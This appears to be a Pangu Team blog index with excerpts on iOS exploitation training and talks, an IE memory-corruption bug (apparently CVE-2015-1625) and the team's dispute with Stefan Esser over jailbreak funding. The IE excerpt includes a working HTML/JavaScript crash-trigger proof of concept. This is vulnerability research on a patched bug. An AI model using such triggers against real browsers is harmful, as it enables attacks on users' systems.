PanguTeam

2015中国互联网安全大会(ISC)演讲&培训

中国互联网安全大会将于2015.9.29-30号于北京国家会议中心举办,盘古团队首席科学家王铁磊作为智能移动终端攻防论坛主席将会分享“iOS安全体系演进过程及漏洞分析”的议题。同时在9.28号的安全训练营中盘古团队首次提供面向安全研究人员的培训,具体培训信息:

培训主题:
iOS用户态漏洞挖掘与利用

培训内容:
首先介绍iOS系统上的各种安全机制,讲解iOS沙盒、地址随机化、代码签名等机制的实现原理和常见对抗策略。随后结合真机操作,进一步介绍越狱环境下的开发调试手段。在漏洞挖掘和利用方面,重点讲解iOS平台上进程间通信漏洞的挖掘及POC分析方法,最后结合一个iOS8.2下的真实漏洞案例讲解如何编写漏洞利用的Exploit。

(更多…)

Black Hat & XCon

盘古团队于上周8月6日在拉斯维加斯举办的Black Hat USA 2015会议上分享了”Review and Exploit Neglected Attack Surfaces in iOS 8″的议题。该议题分析了iOS系统中一些不被注意的攻击面,针对内核层讨论了IOKit Fuzz的改进,针对用户层则重点介绍了XPC Fuzz。
错过该议题的同学也可以在下周举办的XCon 2015上听到该议题的分享。

Black Hat Slide下载

xKungFoo演讲

盘古团队在本周四(4.23)举办的xKungFoo2015会议上分享了”iOS内核漏洞挖掘–fuzz&代码审计”的议题,详细介绍如何挖掘iOS内核漏洞并给出几个内核漏洞的具体分析。

会议相关PPT下载:iOS内核漏洞挖掘

IE浏览器漏洞一例及未初始化内存占位研究

很久以前我们在检测safari稳定性的时候,偶然遇到了一个IE的问题,但在四月份补丁后,这一崩溃不再重现。通过咨询过IE大牛,我们发现这个问题极有可能是今年三月份补丁中的CVE-2015-1625。这个在MS15-018中被修补了的问题被描述为内存破坏漏洞,影响到全部的IE版本,鉴于我们在微软鸣谢中没有找到对应的报告者,所以这个漏洞有可能归于微软内部发现。
要触发这个IE问题,只需要以下代码:

<html>
 <head>
  <meta http-equiv="x-ua-compatible" content="IE=5" />
  <script>
   function fuzz0(){
    e_2.replaceNode(e_2);
    e_0.replaceNode(e_0);
   }
   function entry(){
    e_0.contentEditable="true";
    e_0.createTextRange().select();
    e_1.insertRow();
   }
  </script>
 </head>
 <body id=e_0 onload=entry() onactivate=fuzz0()>
  <table id=e_1>
   <tr>02</tr>
   <big id=e_2>
    <tbody></tbody>
   </big>
  </table>
 </body>
</html>

挂上调试器打开此页面,崩溃地址和寄存器的数值非常不稳定,但在打开page heap后,崩溃点很明显的指向一个固定地址。以WinXP SP3全补丁虚拟机为例,崩溃时log如下:

(更多…)

Let the Truth Speak for Itself

After the release of our blogpost, it is very funny to see Mr. Stefan continues to post unwarranted and spiteful conjectures on Twitter and his blogpost. We suggest the reader refer to our blogpost as well as his blogpost to understand the backgroud.

Among his numerous discriminations and accusations against us (such as calling us thieves and criminals), the main one is that he claims that we have been trying to buy/acquire vulnerabilities to achieve jailbreaks. The “horribly” strong evidence is a piece of chat history between him and @windknown, a member of our team. Although we think it is immoral to post private messages to the public, we do not mind showing the full chat history, and let the truth speak for itself.

(更多…)

Jailbreak Should not Tolerate Regional Discrimination

Since the first release of our untethered jailbreak tool Pangu 7 in June 2014, there have been many ridiculous rumors, discriminations, and vilifications on our team, especially from Stefan Esser (‏@i0n1c). As a team of “nerds”, we did not want to waste time on responding such useless things and hoped that eventually these things would stop after a while. We put 100% efforts on developing new jailbreaks for iOS 8 and successfully released Pangu 8 roughly a month after iOS 8 was released.

We could ignore the increasingly unfunny and ridiculous comments on our team, but cannot bear the racist comments from Stefan Esser in his recent talk at Syscan, which deliberately separate the jailbreak community with “Chinese” and “Western” labels and are full of morbid imaginations. In fact, many well-known iOS “Western” hackers including comex and P0sixninja are visiting Beijing, China today for a mobile security summit.

Apparently, the Pangu team cannot represent all Chinese jailbreak developers. We hereby just want to clarify the rumors, discriminations, and vilifications on our team.

The financial sponsorship of the Pangu team is mainly used to cover the cost of developing jailbreak tools

The “1 million USD” rumor was first posted when evasi0n 7 was released.

For us, our sponsorship is mainly used to support the development of jailbreak tools, cover the cost of software testing, and facility the download servers, etc. Note that, to make our untethered jailbreak tool reliable, we need to test all hardware models from iPhone 4s to iPhone 6 Plus, from iPad 2 to iPad Air, all iOS versions from 7.1 to 8.1. The sponsorship is also used to purchase all kinds of iOS devices for the testing purpose. But anyway, we are also wondering where the “1 million USD” is, LOL.

The Pangu team does not buy vulnerabilities, never and ever

(更多…)